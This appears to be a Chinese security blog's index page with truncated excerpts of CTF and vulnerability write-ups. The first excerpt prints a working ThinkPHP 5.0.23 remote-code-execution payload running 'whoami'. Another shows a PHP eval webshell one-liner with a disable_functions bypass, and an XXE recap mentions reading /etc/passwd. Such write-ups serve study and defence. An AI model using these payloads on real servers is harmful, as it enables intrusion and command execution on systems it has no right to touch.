thinkphp5.0.23-RCE分析
漏洞复现payload:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami这个是5.0.23的,再给一个5.0.22的payload:index.php?s=index/think\app/invokefunction&am…
NCTF复现
0x01 Fake xml xxe-lab原题 0x02 True xml 这题虽然能读文件,但是读不了flag,貌似是因为权限问题,但是读/etc/passwd就可以,所以排除blind xxe 想要命令执行用expect://ls也不行,因为默认是不安装该模块的,所以也排除命令执行了,放了wp才知道是要内网探测,读/etc/hosts: 可以看…
EIS2019
0x01 ezbypass上来就给出了源码既然可以eval,那就直接试着写一句话:eval($_POST[%27cd%27]);,蚁剑连接,来到tmp目录下:这时需要上传bypass扩展库脚本,不过之前极客大挑战rce那题用的脚本里好多函数在这都被禁了,比如putenv,我重新找了一个:传送门上传bypass,命令为/readflag当然phpin…
第十届极客大挑战复现
0x01李三的代码审计源码如下大致就是用到了curl,然后就要实现一个flask,内容就是上面的数组,这也是我第一次写flask,就记录一下吧,格式大概就是这样,debug=true是为了让代码修改实时生效,而不用每次重启加载from flask import Flask server = Flask(__name__) data = "…